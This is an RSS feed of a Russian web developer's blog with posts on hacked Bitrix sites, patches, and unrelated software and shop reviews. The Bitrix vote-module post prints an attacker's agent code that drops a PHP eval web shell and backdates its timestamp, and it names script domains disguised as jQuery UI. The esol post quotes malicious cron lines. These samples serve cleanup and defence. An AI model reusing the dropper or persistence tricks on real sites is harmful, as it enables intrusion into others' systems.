<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Записки веб разработчика fStrange</title>
	<atom:link href="https://fstrange.ru/coder/feed" rel="self" type="application/rss+xml" />
	<link>https://fstrange.ru/coder</link>
	<description></description>
	<lastBuildDate>Thu, 13 Mar 2025 16:35:52 +0000</lastBuildDate>
	<language>ru-RU</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.9.15</generator>
	<item>
		<title>Bitrix уязвимость в модулях импорта kda и esol, патч</title>
		<link>https://fstrange.ru/coder/php/bitrix-uyazvimost-importa-kda-esol-patch.html</link>
					<comments>https://fstrange.ru/coder/php/bitrix-uyazvimost-importa-kda-esol-patch.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Thu, 13 Mar 2025 09:02:37 +0000</pubDate>
				<category><![CDATA[php]]></category>
		<category><![CDATA[bitrix]]></category>
		<category><![CDATA[вирус]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=1038</guid>

					<description><![CDATA[<p>12 апреля была очередная волна взломов. С конца января сайты на Битриксе ломают через уязвимости Аспро, но 12-го прошлись по сайтам с модулем импорта в Excel от kda и esol. Есть официальный патч от&#46;&#46;&#46;</p>
<p>The post <a href="https://fstrange.ru/coder/php/bitrix-uyazvimost-importa-kda-esol-patch.html">Bitrix уязвимость в модулях импорта kda и esol, патч</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>12 апреля была очередная волна взломов. С конца января сайты на Битриксе ломают через уязвимости Аспро, но 12-го прошлись по сайтам с модулем импорта в Excel от kda и esol.</p>
<p>Есть официальный патч от команды esol, хотя нужно постараться чтобы его найти.  <a href="https://marketplace.1c-bitrix.ru/partners/detail.php?ID=1660593.php">Ссылка на официальный патч</a> . Там в &#171;обсуждениях&#187; смотреть.</p>
<p>Там неприятная уязвимость использованием команды exec();</p>
<p>На некоторых сайтах через нее добавляют вот такую конструкцию в cron сервера. Цитирую письмо счастья от хостера</p><pre class="crayon-plain-tag"><em>На сервере были подозрительные cron-задачи от пользователя bitrix</em>:
*/5 * * * * /usr/bin/perl /var/tmp/VZKLlXy &gt;/dev/null 2&gt;&amp;1
*/6 * * * * perl /var/tmp/VZKLlXy &gt;/dev/null 2&gt;&amp;1</pre><p><em>Мы удалили их, рекомендуем проверить файлы пользователя bitrix и при необходимости сменить пароль для этого пользователя.</em></p>
<p>&nbsp;</p>
<p>Я официальный патч чуть подправил в соответствии со своими требованиями. Добавил архивацию исходных файлов, проверку на запись и исправил одну ошибку. + в текущую версию вируса добавили вставку, при который оф патч не срабатывает.</p>
<p><img loading="lazy" class="alignnone size-full wp-image-1042" src="https://fstrange.ru/coder/wp-content/uploads/2025/03/vir_esol.jpg" alt="" width="1005" height="49" srcset="https://fstrange.ru/coder/wp-content/uploads/2025/03/vir_esol.jpg 1005w, https://fstrange.ru/coder/wp-content/uploads/2025/03/vir_esol-300x15.jpg 300w, https://fstrange.ru/coder/wp-content/uploads/2025/03/vir_esol-768x37.jpg 768w" sizes="(max-width: 1005px) 100vw, 1005px" /></p>
<p><img loading="lazy" class="alignnone size-full wp-image-1041" src="https://fstrange.ru/coder/wp-content/uploads/2025/03/esol_forbidden.jpg" alt="" width="830" height="167" srcset="https://fstrange.ru/coder/wp-content/uploads/2025/03/esol_forbidden.jpg 830w, https://fstrange.ru/coder/wp-content/uploads/2025/03/esol_forbidden-300x60.jpg 300w, https://fstrange.ru/coder/wp-content/uploads/2025/03/esol_forbidden-768x155.jpg 768w" sizes="(max-width: 830px) 100vw, 830px" /></p>
<p>Верхняя строка &#171;403 forbidden&#187; добавлена вирусом чтобы патч от esol считал что уже применен.</p>
<p>У моего патча другой тип проверки , по этому будет работать. Минус что добавляется лишняя проверка если есоловский патч все таки применен, но это не критично.</p>
<p><a href="https://fstrange.ru/f/2025/esolfix.php">Ссылка на мой патч к уязвимости от esol kda</a></p>
<p>&nbsp;</p><p>The post <a href="https://fstrange.ru/coder/php/bitrix-uyazvimost-importa-kda-esol-patch.html">Bitrix уязвимость в модулях импорта kda и esol, патч</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/php/bitrix-uyazvimost-importa-kda-esol-patch.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Редирект на  www3.cartprotector</title>
		<link>https://fstrange.ru/coder/php/redirect-na-www3-cartprotector.html</link>
					<comments>https://fstrange.ru/coder/php/redirect-na-www3-cartprotector.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 08 Apr 2024 15:03:24 +0000</pubDate>
				<category><![CDATA[js]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[вирус]]></category>
		<category><![CDATA[лечение]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=1028</guid>

					<description><![CDATA[<p>Это пожалуй хороший пример когда редирект на сайте появляется &#171;сам собой&#187; без проникновения на сайт извне. Был обычный сайт и вдруг в какой то момент он начал редиректить пользователей на www3.cartprotector.com (иногда на www1.cartprotector).&#46;&#46;&#46;</p>
<p>The post <a href="https://fstrange.ru/coder/php/redirect-na-www3-cartprotector.html">Редирект на  www3.cartprotector</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>Это пожалуй хороший пример когда редирект на сайте появляется &#171;сам собой&#187; без проникновения на сайт извне. Был обычный сайт и вдруг в какой то момент он начал редиректить пользователей на www3.cartprotector.com (иногда на www1.cartprotector). Начал проверять сайт. Вируса нет. А в основном шаблоне сайта нахожу вот такой код, типовой код трекера.</p>
<pre class="crayon-plain-tag">&lt;!-- {literal} --&gt;
&lt;script type="text/javascript"&gt;
var _cp = { trackerId: 77777 };
(function(d){
var cp=d.createElement('script');cp.type='text/javascript';cp.async = true;
cp.src='//tracker.cartprotector.com/cartprotector.js';
var s=d.getElementsByTagName('script')[0]; s.parentNode.insertBefore(cp, s);
})(document);
&lt;/script&gt;
&lt;!-- {/literal} --&gt;</pre>



<p>Поискал в интернете. Нашел, цитирую</p>
<blockquote>
<p><em>Автоматизированная система возврата клиентов в интернет-магазин.</em></p>
<p><em>Основные возможности сервиса:</em></p>
<p><em>Система собирает e-mail адреса заинтересованных посетителей и напоминает им о понравившихся товарах;</em><br /><em>CartProtector понимает, когда посетитель собирается уходить, и может сделать ему в этот момент выгодное предложение;</em><br /><em>Гибкие настройки позволяют точечно воздействовать на целевые группы, предоставляя им особые условия совершения покупок;</em><br /><em>CartProtector может воздействовать на нерешительных посетителей, придавая им уверенности в оформлении заказа здесь и сейчас.</em></p>
<p><em>Возможности CartProtector позволяют легко настроить и провести небольшую маркетинговую кампанию или акцию на сайте, очередной раз увеличивая лояльность посетителей и повышая конверсию в продажи.</em></p>
</blockquote>
<p>В общем обычная свистоперделка crm-щиков. В какой то момент компания прекратила работу ,уже несколько лет как похоже, а сайт кто то выкупил или что то подобное. И теперь javascript с трекером редиректит сайт , пугая владельцев.</p>
<p>Ниже пример. Через голандский vpn редирект выглядит так, для российских сайтов по-другому.</p>
<p><img loading="lazy" class="alignnone size-full wp-image-1032" src="https://fstrange.ru/coder/wp-content/uploads/2024/04/www3_cartprotector.png" alt="www3.cartprotector" width="790" height="445" srcset="https://fstrange.ru/coder/wp-content/uploads/2024/04/www3_cartprotector.png 790w, https://fstrange.ru/coder/wp-content/uploads/2024/04/www3_cartprotector-300x169.png 300w, https://fstrange.ru/coder/wp-content/uploads/2024/04/www3_cartprotector-768x433.png 768w" sizes="(max-width: 790px) 100vw, 790px" /></p>
<p>На самых разных сайта, мне в последнюю неделю попадали сайты на Битриксе и на Вордпресе, но по сути код в любой шаблон подойдет.</p><p>The post <a href="https://fstrange.ru/coder/php/redirect-na-www3-cartprotector.html">Редирект на  www3.cartprotector</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/php/redirect-na-www3-cartprotector.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Rescuetime больше не работает под win7</title>
		<link>https://fstrange.ru/coder/about_all/rescuetime-bolshe-ne-rabotaet-pod-win7.html</link>
					<comments>https://fstrange.ru/coder/about_all/rescuetime-bolshe-ne-rabotaet-pod-win7.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 10 Aug 2022 20:04:54 +0000</pubDate>
				<category><![CDATA[обо всем]]></category>
		<category><![CDATA[soft]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=1013</guid>

					<description><![CDATA[<p>Долгое время пользовался приложением для трекинга производительности от ResueTime.com . Но пару недель назад, обнаружил что приложение постоянно висит с красным флажком и не соединяется с сайтом. В логах приложения постоянные ошибки такого вида.&#46;&#46;&#46;</p>
<p>The post <a href="https://fstrange.ru/coder/about_all/rescuetime-bolshe-ne-rabotaet-pod-win7.html">Rescuetime больше не работает под win7</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>Долгое время пользовался приложением для трекинга производительности от ResueTime.com . Но пару недель назад, обнаружил что приложение постоянно висит с красным флажком и не соединяется с сайтом. В логах приложения постоянные ошибки такого вида.</p>



<p>2<em>0220725T171125:1:[network::request]HTTP Response (!CURLE_OK): 35<br>20220725T171125:1:[pusher:shove] Error Response: Could not connect to the RescueTime servers. Your Firewall hardware or software is likely blocking RescueTime.</em></p>



<p>Firewall у меня не стоит и блочить RescueTime нечему. Честно говоря сразу подумал, что и тут настигли санкции и они банально заблочили российские IP. На всякий случай обновил приложение до последней версии, прочитал хелп, попробовал соединиться через прокси, но нет.</p>



<p>Попробовал списать с суппортом и он меня озадачил.  Процитирую полностью.</p>



<blockquote class="wp-block-quote"><p><em>RescueTime is required by contract to comply with current security standards, for our users&#8217; safety in handling billing and payments. RescueTime itself also wants to guarantee our users&#8217; data privacy. Our system indicates that your operating system does not meet the current security standards. We maintain PCI compliance, so we are required by contract to keep our servers at certain security standards, with no back doors for legacy systems. The best solution is to update your operating system. If that is not possible, you may need to upgrade your system. Finally, there may be third-party fixes available for your particular system that bring it into compliance with current security standards.</em></p></blockquote>



<p>Вкратце перевожу. <em>Rescuetime заботится о юзерах и поддерживает высокие стандарты безопасности. Наше приложение обнаружило что ваша OS не соответсвует требованиям безопасности. В идеале обновите Windows 7(</em>предлагают перейти на другую винду<em>), либо накатите патчи безопасности</em>.  <br>Казалось бы какое дело, приложению для трекинга продуктивности до того, какая у меня стоит Винда? В итоге я поставил на windows 7 все патчи. Заскринил что все обновлено.</p>



<figure class="wp-block-image size-full"><a href="https://fstrange.ru/coder/wp-content/uploads/2022/08/win7_update0.jpg"><img loading="lazy" width="638" height="321" src="https://fstrange.ru/coder/wp-content/uploads/2022/08/win7_update0.jpg" alt="" class="wp-image-1016" srcset="https://fstrange.ru/coder/wp-content/uploads/2022/08/win7_update0.jpg 638w, https://fstrange.ru/coder/wp-content/uploads/2022/08/win7_update0-300x151.jpg 300w" sizes="(max-width: 638px) 100vw, 638px" /></a></figure>



<p>И?  Далее поддержка сообщила, что надо переинсталлить Rescuetime и все должно быть ок. Не заработало 🙂</p>



<figure class="wp-block-image size-full"><a href="https://fstrange.ru/coder/wp-content/uploads/2022/08/rescuetime.jpg"><img loading="lazy" width="400" height="230" src="https://fstrange.ru/coder/wp-content/uploads/2022/08/rescuetime.jpg" alt="" class="wp-image-1015" srcset="https://fstrange.ru/coder/wp-content/uploads/2022/08/rescuetime.jpg 400w, https://fstrange.ru/coder/wp-content/uploads/2022/08/rescuetime-300x173.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" /></a></figure>



<p>Все то же сообщение что &#171;<strong>could not connect to the RescueTime servers</strong>&#187; .  А что поддержка? Ответили &#171;извините больше ничем не можем вам помочь&#187;.<br>Спрашивается почему было нельзя сразу сообщить что Rescuetime более не поддерживает и не будет работать под Windows 7?</p><p>The post <a href="https://fstrange.ru/coder/about_all/rescuetime-bolshe-ne-rabotaet-pod-win7.html">Rescuetime больше не работает под win7</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/about_all/rescuetime-bolshe-ne-rabotaet-pod-win7.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Sublime 4 для Windows 32-бит</title>
		<link>https://fstrange.ru/coder/about_all/sublime-4-dlya-windows-32-bit.html</link>
					<comments>https://fstrange.ru/coder/about_all/sublime-4-dlya-windows-32-bit.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 03 Aug 2022 21:31:02 +0000</pubDate>
				<category><![CDATA[обо всем]]></category>
		<category><![CDATA[soft]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=1010</guid>

					<description><![CDATA[<p>Это забавная история . Стоял Sublime 3. Ранее я уже загугливал на оф. сайте и видел что там нет 32-битной версии. Только 64. Но&#8230; Как то искал светлую тему поприличнее, перепробовал несколько, какая то&#46;&#46;&#46;</p>
<p>The post <a href="https://fstrange.ru/coder/about_all/sublime-4-dlya-windows-32-bit.html">Sublime 4 для Windows 32-бит</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>Это забавная история . Стоял Sublime 3. Ранее я уже загугливал на оф. сайте и видел что там нет 32-битной версии. Только 64. Но&#8230;</p>



<p>Как то искал светлую тему поприличнее, перепробовал несколько, какая то при установке требовала какой то дополнительный CLI. Я на нее благополучно плюнул (но не удалял !!!) и забыл воспользовавшись другой темой. Настроил и забыл. </p>



<p>Акт второй, &#171;я что то нажал и&#187;&#8230; начала вываливать загадочная ошибка winerror2 c бектрейсом на 5 строк и загадочными опциями make и force. Информативность ошибки нулевая. При этом она вываливалась при каждом сохранении, что напрочь убивает возможность работать. Гуглеж выдавал мне что там что то связано с ненахождением Питона, но это не то. Питон у меня настроен верно, проверял и с командной строке и в CLI Sublime 3. После долгого лазанья по оф форуму углядел в одном из топиков <a href="https://forum.sublimetext.com/t/cant-install-sublime-text-4-in-32-bit-windows-7/57747">32 битную версию Sublime 4.</a> </p>



<ul><li><a class="" href="https://download.sublimetext.com/sublime_text_build_4107_x32_setup.exe">https://download.sublimetext.com/sublime_text_build_4107_x32_setup.exe 2.6k</a></li><li><a href="https://download.sublimetext.com/sublime_text_build_4107.zip">https://download.sublimetext.com/sublime_text_build_4107.zip 370</a></li></ul>



<p>Хотя официально у них 32 битной нет. Поставил Sublime 4 32-bit . Завелась. И сразу выдала мне ошибку о том что  &#171;Sublime Lightning Plugin requires the Force.com CLI to&#8230;&#187; . И я как то сразу вспомнил про дурацкую ошибку  Winerror2 с опциями make и force. И про неудаленную тему Lightning.  Удалил тему и о чудо! 2 убитых зайца одним выстрелом. И Sublime 4 который я уже не чаял увидеть на моей 32-х битной Win7 и надоевшая ошибка исчезла.</p><p>The post <a href="https://fstrange.ru/coder/about_all/sublime-4-dlya-windows-32-bit.html">Sublime 4 для Windows 32-бит</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/about_all/sublime-4-dlya-windows-32-bit.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Битрикс , вирус, редиректы и уязвимость в модуле vote</title>
		<link>https://fstrange.ru/coder/php/bitrix-virus-vote.html</link>
					<comments>https://fstrange.ru/coder/php/bitrix-virus-vote.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Sat, 16 Jul 2022 20:40:35 +0000</pubDate>
				<category><![CDATA[php]]></category>
		<category><![CDATA[bitrix]]></category>
		<category><![CDATA[вирус]]></category>
		<category><![CDATA[лечение]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=994</guid>

					<description><![CDATA[<p>Примерно с 27 июня массово ломают сайты на  Битриксе. Взломы пока по двум сценариям:<br />
 1. мягкий. Вставили редирект на левый сайт.<br />
2. жесткий. У нескольких клиентов поудаляли часть данных, пострадали инфоблоки Битрикса и пароли юзеров и администраторов<br />
Яндекс.Вебмастер и Яндекс.Директ начал сыпать предупреждениями: Мы обнаружили редирект на мошеннический сайт в рекламируемой вами ссылке.<br />
Вероятно, это связано с некорректной работой платформы, на которой создан ваш сайт.<br />
Пожалуйста, обратитесь в службу поддержки платформы вашего сайта для выяснения обстоятельств или замените рекламируемую ссылку на сайт другой платформы.</p>
<p>The post <a href="https://fstrange.ru/coder/php/bitrix-virus-vote.html">Битрикс , вирус, редиректы и уязвимость в модуле vote</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>Примерно с 27 июня массово ломают сайты на  Битриксе. Взломы пока по двум сценариям:<br> 1. <strong>мягкий</strong>. Вставили редирект на левый сайт. <br>2. <strong>жесткий</strong>. У нескольких клиентов поудаляли часть данных, пострадали инфоблоки Битрикса и пароли юзеров и администраторов, вставили на сайт заглушку против войны с Украиной и поздравления в честь Дня Конституции Украины.</p>



<p>Те кто попали на жесткий сценарий, заметили взлом сразу, а вот те у кого &#171;мягкий&#187; обращаются до сих пор. Заметили только после того как Яндекс.Вебмастер и Яндекс.Директ начал сыпать предупреждениями:</p>



<p><em>Мы обнаружили редирект на мошеннический сайт в рекламируемой вами ссылке.<br>Вероятно, это связано с некорректной работой платформы, на которой создан ваш сайт.<br>Пожалуйста, обратитесь в службу поддержки платформы вашего сайта для выяснения обстоятельств или замените рекламируемую ссылку на сайт другой платформы.</em></p>



<h2>О самой уязвимости Битрикса</h2>



<p>Любопытно что сама уязвимость в модуле vote Битрикса обнаружена <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-27228">еще в марте</a> . И вначале ее оценили на 7 баллов, а уже в июне подняли до 9.8.  <strong>Vulnerability:</strong> CVE-2022-27228. <strong>Solution:</strong><br>Update the &#171;Polls, Votes&#187; (vote) module to 21.0.100 version.</p>



<p>Судя по всему где то в середине июня как минимум у 2 хакерских команд появился рабочий эксплоит(пока в паблике его нет), которые его и эксплуатируют. </p>



<p>Подробного описания работы эксплоита тоже пока никто не выложил.</p>



<h2>Что происходит на взломанном сайте</h2>



<ol><li>Практически во всех случаях взлома появляется файл с характерным названием <em>/bitrix/tools/putin_huilo.php</em></li><li>Вставка &#171;левого&#187; джаваскрипта с редиректом. Тут по разному. но чаще всего в <em>public_html/bitrix/js/main/core/core.js</em> через <em>document.createElement(script)</em> и в <em>public_html/bitrix/modules/main/include/prolog.php</em> . Вставка с нескольких сайтов с маскировкой под JQuery Ui . //sellmestore_pw/jquery-ui.js //techmestore_pw/jquery-ui.js //code.jquery-uii_com/jquery-ui.js</li><li>Удаление информации из инфоблоков и замена паролей и инфы в таблице юзеров </li></ol>



<figure class="wp-block-image size-full"><a href="https://fstrange.ru/coder/wp-content/uploads/2022/07/b_user_putin.png"><img loading="lazy" width="827" height="284" src="https://fstrange.ru/coder/wp-content/uploads/2022/07/b_user_putin.png" alt="" class="wp-image-996" srcset="https://fstrange.ru/coder/wp-content/uploads/2022/07/b_user_putin.png 827w, https://fstrange.ru/coder/wp-content/uploads/2022/07/b_user_putin-300x103.png 300w, https://fstrange.ru/coder/wp-content/uploads/2022/07/b_user_putin-768x264.png 768w" sizes="(max-width: 827px) 100vw, 827px" /></a></figure>



<p>4. добавление или изменение двух агентов в таблице <em>b_agent</em> . Через них файл <em>/bitrix/tools/putin_huilo.php</em> повторно появляется и выполняются прочие вредоносные действия. </p>



<figure class="wp-block-image size-full"><a href="https://fstrange.ru/coder/wp-content/uploads/2022/07/b_agent.png"><img loading="lazy" width="735" height="176" src="https://fstrange.ru/coder/wp-content/uploads/2022/07/b_agent.png" alt="" class="wp-image-997" srcset="https://fstrange.ru/coder/wp-content/uploads/2022/07/b_agent.png 735w, https://fstrange.ru/coder/wp-content/uploads/2022/07/b_agent-300x72.png 300w" sizes="(max-width: 735px) 100vw, 735px" /></a></figure>



<pre class="crayon-plain-tag">//код второго агента
$fName = str_replace('/modules/main/classes/mysql', '', dirname(__FILE__)).'/admin/sale_order_sunburns.php'; $files = scandir(dirname($fName)); file_put_contents($fName, '<!--?php fccf7be775d1(@$_POST[\'f181ae000\']); function fccf7be775d1($zd42d3ee04a0){ @eval($zd42d3ee04a0); } ?--> '); touch($fName, filemtime(dirname($fName).'/'.$files[2]));</pre>



<h2>Как лечить Битрикс от вируса?</h2>



<p>Если сайт ломанули по жесткому варианту, то вначале конечно восстановление из бекапа. Иначе никак не вернуть информацию.</p>



<p>Если по &#171;мягкому&#187; и информация в инфоблоках и пароли юзеров не пострадали, то в первую очередь проверяем таблицу <em>b_agent</em>  на наличие левых &#171;агентов&#187; и удаляем если видим те 2 что на скрине выше.</p>



<p>Затем удаляем файл putin_huilo.php . Затем вставки джаваскрипта с редиректом на мошеннический сайт(на которые ругается Яндекс), примеры я приводил выше.</p>



<p>Далее конечно я бы проверил на наличие других вирусных файлов, но если вы вовремя спохватились то их &#171;может&#187; и не быть. Слово &#171;может&#187; очень плохое в отношении безопасности сайта, если умеете проверьте сами, не умеете доверьте специалисту за денежку, <strong>например <a href="https://fstrange.ru/coder/cure_site_virus">поручите лечение сайта мне</a></strong></p>



<p>Далее на всякий случай сменить пароли админов и проверить нет ли лишних. Это азбучное действие после любого взлома, но многие его забывают выполнить.</p>



<p>И последнее действие это устранение самой уязвимости. Вариант 1 &#8212; обновить модуль vote Битрикса до версии 21.0.100 или выше. Вот тут Bitrix нередко подкладывает грабли. Те у кого не продлена лицензия не смогут обновится. А у тех у кого продлена иногда не обновляется модуль. В этом случае модуль vote можно просто выключить если он не нужен . И для чистоты совести папку bitrix/modules/vote переименовать после отключения. Или еще вариант пропатчить два файла</p>



<pre class="crayon-plain-tag">//В файл /bitrix/tools/vote/uf.php перед required
// Добавляем:
$request  = \Bitrix\Main\Context::getCurrent()-&gt;getRequest();
 if ( $request -&gt;isPost()) {
    CHTTP::SetStatus( "404 Not Found" );
    @define( "ERROR_404" , "Y" );
     die ();
} 


//В файл  /bitrix/tools/html_editor_action.php перед required
// Добавляем:
$request  = \Bitrix\Main\Context::getCurrent()-&gt;getRequest();
 if ( $request -&gt;isPost()) {
    CHTTP::SetStatus( "404 Not Found" );
    @define( "ERROR_404" , "Y" );
     die ();
}</pre>



<p>Эти 2 патча частично сохраняют функционирование модуля. Но!!! Это годно только как временное решение до обновления модуля vote. Эти патчи не дают полной защиты.</p>



<p>Если у вас не получается вылечить сайт самостоятельно, welcome, могу помочь! 6 месяцев гарантии на работу, цена 1200руб. <blockquote class="promo">
	<h3>Контакты</h3>
        <p><b><img alt="" class="img0" src="/coder/i/telegram.gif" /></b><b> <a href="https://t.me/fStrange">fStrange</a></b></p>
	<p><img align="absmiddle" alt="" class="img0" src="/coder/i/skype.gif" /><strong> <a href="skype:fstrange.ru?chat">fstrange.ru</a></strong></p>        
	<p><b><img alt="" class="img0" src="/coder/i/mail.gif" /></b><b> <a href="mailto:cure@fstrange.ru">cure@fstrange.ru</a></b></p>
</blockquote></p><p>The post <a href="https://fstrange.ru/coder/php/bitrix-virus-vote.html">Битрикс , вирус, редиректы и уязвимость в модуле vote</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/php/bitrix-virus-vote.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Сбермегамаркет отзыв пользователя</title>
		<link>https://fstrange.ru/coder/about_all/sbermegamarket_otziv.html</link>
					<comments>https://fstrange.ru/coder/about_all/sbermegamarket_otziv.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Thu, 02 Sep 2021 20:49:45 +0000</pubDate>
				<category><![CDATA[обо всем]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=985</guid>

					<description><![CDATA[<p>Гуглил как то себе на велосипед левый шифтер. Первое что проверил Tmall на али, не хотелось ждать поэтому проверял росийские варианты. Затем проверил ближайший Декатлон и сайт местного приличного магазина. Либо отсутствовал шифтер который&#46;&#46;&#46;</p>
<p>The post <a href="https://fstrange.ru/coder/about_all/sbermegamarket_otziv.html">Сбермегамаркет отзыв пользователя</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>Гуглил как то себе на велосипед левый шифтер. Первое что проверил Tmall на али, не хотелось ждать поэтому проверял росийские варианты. Затем проверил ближайший Декатлон и сайт местного приличного магазина. Либо отсутствовал шифтер который нужен, либо за завышенную цену. А на мой древний вел, покупать дорогую цацку нет смысла.</p>
<p>И тут на глаза попался Сбермегамаркет с приличным ассортиментом , бесплатной доставкой и вкусными ценами.</p>
<p>Ну что, надо пробовать!</p>
<h3>Попытка номер 1. Без регистрации.</h3>
<p>Нет никакого желания региться в очередном сервисе в котором я возможно и не появлюсь. Выбо опытного пользователя &#8212; быстрая оплата! Поэтому бросаем в корзину, выбираем доставку , платим&#8230; И вроде деньги ушли. Через час гляжу, а фиг тебе! Заказ отменен. Денежка вернулась.<br />
Думаем, работа с разными магазинами. Ну мало ли. В магазине вероятно отбили, кончились или что еще. Пробую еще раз у другого поставщика, и &#8230;  та же история.</p>
<h3>Попытка номер 2. С регистрацией</h3>
<p>Покружился я, а шифтер то все ще нужен. И цена нормальная. Ок регимся, может что то быстрая оплата чудит? Тем более можно не париться и региться через SberID и не плодить сущеностей. Регимся и видим бонус +1000 р. Полпокупки можно оплатить бонусными. Приятно!</p>
<p>Покупаю еще раз, на всякий случай другую , схожую модель шифтера. Теперь она обошлась в 330 рублей и 330 из бонусов. Приятно! Пробую оплатить через приложение, вам придет пуш, &#8230; И ? Пуша нет. Вторая попытка, пуша нет.<br />
Сбер, ау? Сделать магазин и не осилить прикрутить свою же оплату нормально?</p>
<p>В итоге отбиваю заказ и пробую старым путем через карту. Того же Сбера. Через ввод данных карты и прочее. И? Опять косяк.</p>
<p>Я упрямый, к черту сберкарту, пробуем бывшие яндекс.деньги. При этом наблюдаю что бонусы то ушли с предыдущей покупкой 🙁 . Ну да фиг с ним. Яндекс прошел.</p>
<p>Лезу в заказы и вижу, что у меня прошли 2 разных заказа. В итоге 1 пришлось отбить. Через какое то время вернулся и утерянный бонус. Только я подумал что Сбер себя реабилитировал&#8230;</p>
<p>Заглядываю в личный кабинет и вижу опечатку в почте. Как исправить? А никак. В хелпе сказано звоните на бесплатный номер оператору! Элементарное действие по замене данных юзера и я для этого должен куда то звонить?</p>
<p><strong>Итого</strong>. <strong>Сбермегамаркет</strong>. За цену спасибо. Ассортимент ок. Но столько косяков для инет магазина это перебор.</p>
<p>п.с. И только я дописал статью и мне прилетает пуш об отмене заказа. Почему пуш прилетает через полчаса после самого действия? Как юзер должен ориентироваться если он выполнил несколько разных действия в магазине? Неуд. Сбермаркет. Неуд!</p><p>The post <a href="https://fstrange.ru/coder/about_all/sbermegamarket_otziv.html">Сбермегамаркет отзыв пользователя</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/about_all/sbermegamarket_otziv.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ростелеком заменить роутер на новый</title>
		<link>https://fstrange.ru/coder/about_all/rostelekom-zamenit-router.html</link>
					<comments>https://fstrange.ru/coder/about_all/rostelekom-zamenit-router.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 17 Aug 2021 07:36:12 +0000</pubDate>
				<category><![CDATA[обо всем]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=979</guid>

					<description><![CDATA[<p>По телефон позвонил бот от Ростелекома. Обычно ботов сразу отрубаю, но тут даже дослушал. Вменяемое предложение, заменить роутер на новый ибо старый не обеспечивает нужных скоростей. Бесплатно. Мастер приедет в удобное время. Если согласны&#46;&#46;&#46;</p>
<p>The post <a href="https://fstrange.ru/coder/about_all/rostelekom-zamenit-router.html">Ростелеком заменить роутер на новый</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>По телефон позвонил бот от Ростелекома. Обычно ботов сразу отрубаю, но тут даже дослушал. Вменяемое предложение, заменить роутер на новый ибо старый не обеспечивает нужных скоростей. Бесплатно. Мастер приедет в удобное время. Если согласны нажмите&#8230;</p>
